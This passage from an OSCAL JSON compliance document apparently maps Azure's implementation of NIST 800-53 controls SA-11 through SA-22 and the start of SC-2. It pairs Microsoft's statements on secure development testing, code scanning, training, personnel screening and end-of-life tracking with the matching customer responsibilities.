coverage.","provided-uuid":"1d468df9-808e-4bc4-9437-396ee42ffc24"}]},"description":"See inheritance and customer responsibility statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]},{"uuid":"dd6272a9-6c47-4e0d-bfdc-2fb40a913a00","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"SA-15-051"},{"name":"control-origination","value":"organization"},{"name":"control-origination","value":"system-specific"},{"name":"control-origination","value":"customer-configured"}],"statement-id":"sa-11_smt.c","by-components":[{"uuid":"3ce062f8-1465-47d0-8984-6692e7a33e9c","export":{"provided":[{"uuid":"a534ca40-3a44-4abb-934c-814309fd4694","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"SA-15-051"}],"description":"The results of the security tests are documented in tickets opened in Azure DevOps. Remediation work and successful retesting is documented in the same ticket."}],"responsibilities":[{"uuid":"575fd2bf-088f-4732-b4ea-af97d27aef99","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"SA-15-051"}],"description":"For customers of IaaS and PaaS services, the customer is responsible for requiring the developer of customer-deployed resources to produce evidence of assessment plan execution and the results of testing/evaluation.","provided-uuid":"a534ca40-3a44-4abb-934c-814309fd4694"}]},"description":"See inheritance and customer responsibility statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]},{"uuid":"415cea3b-5459-483e-82d9-699dd2e6120d","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"SA-15-052"},{"name":"control-origination","value":"organization"},{"name":"control-origination","value":"system-specific"},{"name":"control-origination","value":"customer-configured"}],"statement-id":"sa-11_smt.d","by-components":[{"uuid":"e6de0184-a899-4a0d-b6e6-ef294c299862","export":{"provided":[{"uuid":"c29e2629-4e74-4877-bbad-d943a9fbc07d","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"SA-15-052"}],"description":"The Azure system owner is responsible for ensuring that all system development and maintenance activities are performed in accordance with the Microsoft SDL process. A formal review process is implemented to ensure that new or modified source code authored by Microsoft's online services staff is developed in a secure fashion, no malicious code has been introduced into the system, and that proper coding practices are followed. The reviewers' names, review dates, and review results are documented in Azure DevOps, and maintained for audit purposes. A formal security quality assurance process is implemented to test for vulnerabilities to known security exposures and exploits. The process includes the use of automated security testing tools and requires that all vulnerabilities are remediated in accordance with the SDL BugBar. A ticket for each vulnerability is opened in Azure DevOps and tracked to resolution."}],"responsibilities":[{"uuid":"74481829-4bcf-404c-b91a-59cefcb53369","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"SA-15-052"}],"description":"For customers of IaaS and PaaS services, the customer is responsible for requiring the developer of customer-deployed resources to perform testing and evaluation, including implementing a verifiable flaw remediation process.","provided-uuid":"c29e2629-4e74-4877-bbad-d943a9fbc07d"}]},"description":"See inheritance and customer responsibility statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]},{"uuid":"dfeb05ce-b1dd-43d7-9cb1-3e168f26c5b4","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"SA-15-053"},{"name":"control-origination","value":"organization"},{"name":"control-origination","value":"system-specific"},{"name":"control-origination","value":"customer-configured"}],"statement-id":"sa-11_smt.e","by-components":[{"uuid":"7c52f23e-c188-49db-8b60-b1a752456aa4","export":{"provided":[{"uuid":"d2762d0d-78d4-4236-ad77-0d578ac16fba","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"SA-15-053"}],"description":"As part of the SDL process, flaws identified during testing are remediated prior to release. The results of the security tests are documented in tickets opened in Azure DevOps. Remediation work and successful retesting is documented in the same ticket."}],"responsibilities":[{"uuid":"aac46457-97dd-43ae-8d4f-37e6f7426984","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"SA-15-053"}],"description":"For customers of IaaS and PaaS services, the customer is responsible for requiring the developer of customer-deployed resources to perform testing and evaluation, including the correction of flaws identified during security testing/evaluation.","provided-uuid":"d2762d0d-78d4-4236-ad77-0d578ac16fba"}]},"description":"See inheritance and customer responsibility statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]}]},{"uuid":"62560790-bdd5-443c-bdad-ac65804be171","props":[{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"category","value":"security"},{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"activity-type","value":"management"}],"control-id":"sa-11.1","statements":[{"uuid":"bf09748c-590f-41bd-bfaa-2854901aa010","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"SA-15-054"},{"name":"control-origination","value":"system-specific"},{"name":"control-origination","value":"customer-configured"}],"statement-id":"sa-11.1_smt","by-components":[{"uuid":"ec2bb39e-1f15-47f1-a7ff-dc1f97cf316a","export":{"provided":[{"uuid":"8736a9be-36e8-449c-bcbc-4a8a80ab602f","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"SA-15-054"}],"description":"Code reviews are performed as part of the Microsoft Security Development Lifecycle (SDL), including using automated tools. All release builds are run through virus scanning checks and the results are resolved prior to release into production. Automated code analysis tools such as BinSkim, Credential Scanner (CredScan), and other tools are run as determined by the SDL requirements. CredScan is utilized on all official builds in all build pipelines, and either breaking the build process preventing production use or creating work items assigned to the Azure service team for remediation. Malware identification is run on all builds in all pipelines, and it breaks the build if issues are found._x000D_ _x000D_"}],"responsibilities":[{"uuid":"0ce767d7-dde6-4d74-8aa6-c8a3610aa56f","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"SA-15-054"}],"description":"The customer is responsible for requiring the developer of customer-deployed resources to employ static code analysis tools to identify common flaws and document the results of the analysis.","provided-uuid":"8736a9be-36e8-449c-bcbc-4a8a80ab602f"}]},"description":"See inheritance and customer responsibility statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]}]},{"uuid":"b735f8af-aa91-4f88-a0fa-7d90a8087314","props":[{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"category","value":"security"},{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"activity-type","value":"management"}],"control-id":"sa-11.2","statements":[{"uuid":"fbdb32f9-be8c-42f9-a290-3be18878002f","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"SA-15-055"},{"name":"control-origination","value":"system-specific"},{"name":"control-origination","value":"customer-configured"}],"statement-id":"sa-11.2_smt","by-components":[{"uuid":"c57a606b-1cbb-4956-b0d8-10eb8509c6e6","export":{"provided":[{"uuid":"1a724892-a606-4f42-b10e-4c46d693ab95","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"SA-15-055"}],"description":"In accordance with Microsoft's Security Development Lifecycle (SDL), security testing occurs in several phases throughout the SDL process. Specifically, security testing occurs during the following phases:_x000D_ _x000D_ * Phase 3 - Implementation_x000D_ * Phase 4 - Verification_x000D_ * Phase 5 - Release_x000D_ _x000D_ Testing at the release phase is performed on the as-built system. Vulnerabilities found at the release testing phase are tracked and remediated._x000D_ _x000D_"}],"responsibilities":[{"uuid":"fca2dc8f-ac97-4f91-af41-0bf246cb12b1","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"SA-15-055"}],"description":"The customer is responsible for requiring the developer of customer-deployed resources to perform testing and evaluation, including threat and vulnerability analyses and subsequent testing/evaluation of the as-built resources.","provided-uuid":"1a724892-a606-4f42-b10e-4c46d693ab95"}]},"description":"See inheritance and customer responsibility statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]}]},{"uuid":"a25db826-6a1c-4a54-9f16-50227b533765","props":[{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"category","value":"security"},{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"activity-type","value":"management"}],"control-id":"sa-15","statements":[{"uuid":"f40e8c07-5736-45f9-bc0d-b2f5847b1bcf","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"SA-15-056"},{"name":"control-origination","value":"organization"},{"name":"control-origination","value":"system-specific"},{"name":"control-origination","value":"customer-configured"}],"statement-id":"sa-15_smt.a","by-components":[{"uuid":"09a1c95e-df63-449e-aa41-2eaae248962f","export":{"provided":[{"uuid":"b198bfa6-e550-4ca4-9575-c45f9e8c1ff5","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"SA-15-056"}],"description":"All development in Azure must follow the Security Development Lifecycle (SDL) process for all engineering and development projects. The SDL process includes the following: * Addressing security requirements: The Requirements phase of the SDL includes the project inception-when the organization considers security and privacy at a foundational level-and a cost analysis-when determining if development and support costs for improving security and privacy are consistent with business needs. * Identifying standards and tools/documents tools and configurations: The Implementation phase is when the organization creates the documentation and tools the customer uses to make informed decisions about how to deploy the software securely. To this end, the Implementation phase is when the organization establishes development best practices to detect and remove security and privacy issues early in the development cycle. Microsoft understands, observes, and implements the security requirements and considerations as outlined in GSA IT Security Procedural Guide 09-48, Security Language for IT Acquisition Efforts for the information system consistent with the Azure offering's requirements. * Documents, manages, and ensures the integrity of changes: During the Verification phase, the organization ensures that the code meets the security and privacy tenets established in the previous phases. This is done through security and privacy testing, and a security push-which is a team-wide focus on threat model updates, code review, testing, and thorough documentation review and edit. A public release privacy review is also completed during the Verification phase."}],"responsibilities":[{"uuid":"ef279309-1d21-4c14-9a9b-32cb9841de2f","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"SA-15-056"}],"description":"For customers of IaaS and PaaS services, the customer is responsible for requiring developers of customer-deployed resources to follow a documented development process that: explicitly addresses security and privacy requirements; identifies standards and tools used; documents the specific tool options and configurations used; documents, manages, and ensures the integrity of changes to the process and/or tools used in development.","provided-uuid":"b198bfa6-e550-4ca4-9575-c45f9e8c1ff5"}]},"description":"See inheritance and customer responsibility statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]},{"uuid":"99a0c780-ed75-458a-a92a-bfb821daca41","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"SA-15-057"},{"name":"control-origination","value":"organization"},{"name":"control-origination","value":"system-specific"},{"name":"control-origination","value":"customer-configured"}],"statement-id":"sa-15_smt.b","by-components":[{"uuid":"aa49ec27-15c1-42b2-835b-264de1bc9954","export":{"provided":[{"uuid":"0187dd62-f647-4c2b-bb0c-d157fbd4c412","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"SA-15-057"}],"description":"Microsoft reviews the SDL process at least every six months to ensure that the process, standards, and tools selected and employed provide sufficient security and privacy for all services and software developed and released by Microsoft."}],"responsibilities":[{"uuid":"3ac72007-a2f9-4a40-aa2c-1f4efde19668","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"SA-15-057"}],"description":"For customers of IaaS and PaaS services, the customer is responsible for reviewing the development process, standards, tools, and tool options/configurations as needed to determine if they can satisfy security and privacy requirements.","provided-uuid":"0187dd62-f647-4c2b-bb0c-d157fbd4c412"}]},"description":"See inheritance and customer responsibility statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]}]},{"uuid":"012a5d50-27bb-4f8a-9fa0-7d4b5b51df20","props":[{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"category","value":"security"},{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"activity-type","value":"management"}],"control-id":"sa-15.3","statements":[{"uuid":"202cc2ae-6d6d-4db0-8194-259b65c06ba9","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"SA-15-058"},{"name":"control-origination","value":"organization"},{"name":"control-origination","value":"system-specific"},{"name":"control-origination","value":"customer-configured"}],"statement-id":"sa-15.3_smt","by-components":[{"uuid":"a0ba7e16-d0b4-4e94-87ce-26ce1a62377b","export":{"provided":[{"uuid":"480819c3-1d9b-4544-b6bc-ce8f6d1f1c57","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"SA-15-058"}],"description":"Microsoft reviews the SDL process at least every six (6) months to ensure that the process, standards, and tools selected and employed provide sufficient security for all services developed and released by Microsoft."}],"responsibilities":[{"uuid":"66dbdc98-63b4-470c-92e4-9e83b35ccb22","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"SA-15-058"}],"description":"The customer is responsible for requiring the developer of the information system, system component, or information system service to perform a criticality analysis at an organization-defined breadth/depth and at organization-defined decision points in the system development life cycle.","provided-uuid":"480819c3-1d9b-4544-b6bc-ce8f6d1f1c57"}]},"description":"See inheritance and customer responsibility statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]}]},{"uuid":"06908960-c7b3-4183-b7f2-df874afff685","props":[{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"category","value":"security"},{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"activity-type","value":"management"}],"control-id":"sa-16","statements":[{"uuid":"8ed8dfc7-0410-4c63-b228-5230e6c05876","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"SA-15-059"},{"name":"control-origination","value":"system-specific"},{"name":"control-origination","value":"customer-configured"}],"statement-id":"sa-16_smt","by-components":[{"uuid":"9d3e3e58-71a3-4350-ba8a-422125021219","export":{"provided":[{"uuid":"23932255-7020-47f0-af1c-fd17cb3e3e51","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"SA-15-059"}],"description":"All members of software development teams receive appropriate training to stay informed about security basics and recent trends in security. Individuals who develop software programs are required to complete at least one security training course in person or online each year. Security training can help ensure software is created with security in mind and can also help development teams stay current on security issues. Project team members are strongly encouraged to seek additional security and privacy education that is appropriate to their needs or products. Azure service teams maintain, secure, manage, and store information system documentation, including documentation regarding: * Secure configuration, installation, and operation of the information system; * Effective use and maintenance of security features/functions; and * Known vulnerabilities regarding configuration and use of administrative (i.e. elevated) functions This documentation is stored in each service team's SharePoint site through Azure Security and is made available to service team members. Review of relevant documentation is part of initial and ongoing training activities held at least annually."}],"responsibilities":[{"uuid":"b5c01163-7a93-4f9a-bcae-1f68153170c9","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"SA-15-059"}],"description":"For customers of IaaS and PaaS services, the customer is responsible for requiring the developer of customer-deployed resources to provide customer-defined training on the correct use and operation of the implemented security functions, controls, and/or mechanisms for the resources provided.","provided-uuid":"23932255-7020-47f0-af1c-fd17cb3e3e51"}]},"description":"See inheritance and customer responsibility statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]}]},{"uuid":"66db9b0d-843e-4f5a-99ae-4e7b3c1af8af","props":[{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"category","value":"security"},{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"activity-type","value":"management"}],"control-id":"sa-17","statements":[{"uuid":"1ab19011-906a-4c0a-b06a-c6df8afbc2c5","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"SA-15-060"},{"name":"control-origination","value":"system-specific"},{"name":"control-origination","value":"customer-configured"}],"statement-id":"sa-17_smt.a","by-components":[{"uuid":"7d33d081-4e03-4535-a7d4-c41e65dc3049","export":{"provided":[{"uuid":"28964048-d3b6-4625-9463-d9ef142d50ae","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"SA-15-060"}],"description":"Microsoft's software development practices include evaluating the design, security and privacy architecture of new services and components in the environment. The C+AI Security Assurance team works with the component/feature teams to provide guidance during the implementation of Security Development Lifecycle (SDL) activities in software development projects including identifying requirements for deep review such as threat modeling, and penetration testing."}],"responsibilities":[{"uuid":"f1159628-caff-4df5-9f67-3c9f4b25f743","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"SA-15-060"}],"description":"For customers of IaaS and PaaS services, the customer is responsible for requiring the developer of customer-deployed resources to produce a design specification and security and privacy architecture that is consistent with and supportive of the customer's enterprise architecture.","provided-uuid":"28964048-d3b6-4625-9463-d9ef142d50ae"}]},"description":"See inheritance and customer responsibility statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]},{"uuid":"4d1074e1-6679-4c64-b609-f93cc317494a","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"SA-15-061"},{"name":"control-origination","value":"system-specific"},{"name":"control-origination","value":"customer-configured"}],"statement-id":"sa-17_smt.b","by-components":[{"uuid":"95704044-4fba-4ea0-8fc4-95a7bde1c978","export":{"provided":[{"uuid":"068c4190-3f29-466f-bb77-939d767a19e7","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"SA-15-061"}],"description":"The security and privacy architecture produced during the Design phase of the SDL process defines all attack surfaces, their associated risks, and security and privacy functionality necessary to address those risks."}],"responsibilities":[{"uuid":"fb7b390f-d268-47d3-8da9-9aafe3bf6b7a","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"SA-15-061"}],"description":"For customers of IaaS and PaaS services, the customer is responsible for requiring the developer of customer-deployed resources to produce a design specification and security and privacy architecture that accurately and completely describes the required security functionality, and the allocation of security and privacy controls among logical resources.","provided-uuid":"068c4190-3f29-466f-bb77-939d767a19e7"}]},"description":"See inheritance and customer responsibility statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]},{"uuid":"6874f388-2832-4358-b427-84ea04a38054","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"SA-15-062"},{"name":"control-origination","value":"system-specific"},{"name":"control-origination","value":"customer-configured"}],"statement-id":"sa-17_smt.c","by-components":[{"uuid":"f38ea3d2-f6cf-4c7d-a76a-b248948b22a8","export":{"provided":[{"uuid":"f361366d-c81b-4a7b-a2a1-4da02ed7a3d2","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"SA-15-062"}],"description":"The security and privacy architecture produced during the Design phase of the SDL process demonstrates how individual security and privacy functions reinforce each other to provide a complete and unified approach to protection."}],"responsibilities":[{"uuid":"58b2ac97-0e0a-4dd0-b5bb-682011f5e589","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"SA-15-062"}],"description":"For customers of IaaS and PaaS services, the customer is responsible for requiring the developer of customer-deployed resources to produce a design specification and security and privacy architecture that expresses how individual security and privacy functions, mechanisms, and services work together to provide required security and privacy capabilities and a unified approach to protection.","provided-uuid":"f361366d-c81b-4a7b-a2a1-4da02ed7a3d2"}]},"description":"See inheritance and customer responsibility statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]}]},{"uuid":"90cfdf04-743c-4bf7-b534-865bec5b0f08","props":[{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"category","value":"security"},{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"activity-type","value":"management"}],"control-id":"sa-21","statements":[{"uuid":"45a990e5-784f-4643-9ecd-c4359c762b47","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"SA-15-063"},{"name":"control-origination","value":"organization"},{"name":"control-origination","value":"system-specific"},{"name":"control-origination","value":"customer-configured"}],"statement-id":"sa-21_smt.a","by-components":[{"uuid":"e82c3d03-fc7c-48c7-8b79-a22d5a2a3a44","export":{"provided":[{"uuid":"a8064cb8-0c89-4bdd-ad75-9bfe5ab0c3c1","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"SA-15-063"}],"description":"The Microsoft Security department conducts background checks and enforces the screening policies for all personnel. Background checks in the form of the Microsoft Cloud Screen are required for new hires or personnel transferring to positions that involve access to customers' work sites and/or sensitive areas, including access to customer PII. The Microsoft Cloud Screen includes the following: * Employment history check for the previous five years * Education Check (highest degree obtained) * Social Security Number (SSN) Check * Criminal History Check for the previous seven years * Office of Foreign Assets Control List (OFAC) Check * Bureau of Industry and Security List (BIS) Check * Office of Defense Trade Controls Debarred Persons List Check Vendor staff with access to customer data are required to sign a background screening addendum with Microsoft or provide the results of the background screening from the third-party provider. Microsoft managers are required to include screening verbiage in their respective SOWs with vendors."}],"responsibilities":[{"uuid":"e74d5ddd-6d1b-4477-bb1e-079288e7b051","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"SA-15-063"}],"description":"The customer is responsible for having appropriate access authorizations as determined by assigned organization-defined official government duties.","provided-uuid":"a8064cb8-0c89-4bdd-ad75-9bfe5ab0c3c1"}]},"description":"See inheritance and customer responsibility statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]},{"uuid":"aa2dc9b2-04d8-4aad-80fd-bfe574187d12","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"SA-15-064"},{"name":"control-origination","value":"organization"},{"name":"control-origination","value":"system-specific"},{"name":"control-origination","value":"customer-configured"}],"statement-id":"sa-21_smt.b","by-components":[{"uuid":"24d248a6-9943-421b-805a-e1776876e9bb","export":{"provided":[{"uuid":"2795927d-1475-4b15-86f9-c28ba048a7a7","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"SA-15-064"}],"description":"The Microsoft Security department conducts background checks and enforces the screening policies for all personnel. Background checks in the form of the Microsoft Cloud Screen are required for new hires or personnel transferring to positions that involve access to customers' work sites and/or sensitive areas, including access to customer PII. The Microsoft Cloud Screen includes the following: * Employment history check for the previous five years * Education Check (highest degree obtained) * Social Security Number (SSN) Check * Criminal History Check for the previous seven years * Office of Foreign Assets Control List (OFAC) Check * Bureau of Industry and Security List (BIS) Check * Office of Defense Trade Controls Debarred Persons List Check Vendor staff with access to customer data are required to sign a background screening addendum with Microsoft or provide the results of the background screening from the third-party provider. Microsoft managers are required to include screening verbiage in their respective SOWs with vendors."}],"responsibilities":[{"uuid":"5df0c70d-c6f0-4c73-b1c7-841db4504258","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"SA-15-064"}],"description":"The customer is responsible for satisfying organization-defined additional personnel screening criteria.","provided-uuid":"2795927d-1475-4b15-86f9-c28ba048a7a7"}]},"description":"See inheritance and customer responsibility statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]}]},{"uuid":"fca0272d-bde2-4ac1-be02-7b9899974778","props":[{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"category","value":"security"},{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"activity-type","value":"management"}],"control-id":"sa-22","statements":[{"uuid":"6165d172-4a1b-4996-9128-109106e47cf2","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"SA-15-065"},{"name":"control-origination","value":"organization"},{"name":"control-origination","value":"system-specific"},{"name":"control-origination","value":"customer-configured"}],"statement-id":"sa-22_smt.a","by-components":[{"uuid":"266ff496-fc99-41df-a7c9-77cc3a1c53e2","export":{"provided":[{"uuid":"a65cb6bd-f9b9-4009-8641-ed2f8a526d0d","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"SA-15-065"}],"description":"Azure does not rely on components that are end of life or no longer supported. Azure tracks software and hardware end-of-life and end-of-support and establishes decommissioning plans as necessary. Azure tracks decommissioning of servers and network devices using dashboards and maintenance tickets. If necessary, Azure utilizes extended support from external vendors where available."}],"responsibilities":[{"uuid":"713f7301-cb9f-4fe0-8dbb-3791c6bb4057","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"SA-15-065"}],"description":"The customer is responsible for replacing information system components when support for the components is no longer available from the developer, vendor, or manufacturer.","provided-uuid":"a65cb6bd-f9b9-4009-8641-ed2f8a526d0d"}]},"description":"See inheritance and customer responsibility statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]},{"uuid":"13d560e8-8c10-414e-b678-c78bbc8f85d7","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"SA-15-066"},{"name":"control-origination","value":"organization"},{"name":"control-origination","value":"system-specific"},{"name":"control-origination","value":"customer-configured"}],"statement-id":"sa-22_smt.b","by-components":[{"uuid":"ba396f4a-8a71-4ab6-9405-2533d61539c4","export":{"provided":[{"uuid":"0176f4ad-4085-451b-bba7-6e19d4acb228","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"SA-15-066"}],"description":"Azure does not rely on components that are end of life or no longer supported. Azure tracks software and hardware end-of-life and end-of-support and establishes decommissioning plans as necessary. Azure tracks decommissioning of servers and network devices using dashboards and maintenance tickets. If necessary, Azure utilizes extended support from external vendors where available."}],"responsibilities":[{"uuid":"fcde4162-db4b-41b8-8fa6-8ce52ad8cb4e","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"SA-15-066"}],"description":"The customer is responsible for providing options for alternative resources for the continued use of unsupported system components.","provided-uuid":"0176f4ad-4085-451b-bba7-6e19d4acb228"}]},"description":"See inheritance and customer responsibility statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]}]},{"uuid":"229f3c99-31ae-4812-bc6f-e89ba47a4187","props":[{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"category","value":"security"},{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"activity-type","value":"technical"}],"control-id":"sc-2","statements":[{"uuid":"c5de97af-6c9a-4ab6-bcce-c4b9ef424983","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"SC-16-006"},{"name":"control-origination","value":"system-specific"},{"name":"control-origination","value":"customer-configured"}],"statement-id":"sc-2_smt","by-components":[{"uuid":"01920d64-e6f0-41cc-9048-a02aec541204","export":{"provided":[{"uuid":"ff004786-471c-46e3-9a04-bf74ef4fc526","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"SC-16-006"}],"description":"Azure separates functionality into standard access and elevated access, corresponding to user and management functionality. This ensures logical separation of functionality. All personnel with standard access are granted system metadata read access used for regular troubleshooting, release management, and other maintenance and monitoring activities. Standard access provides permissions to key Azure tools, services, SharePoint sites, documentation, and a variety of dashboards._x000D_ _x000D_ All personnel must 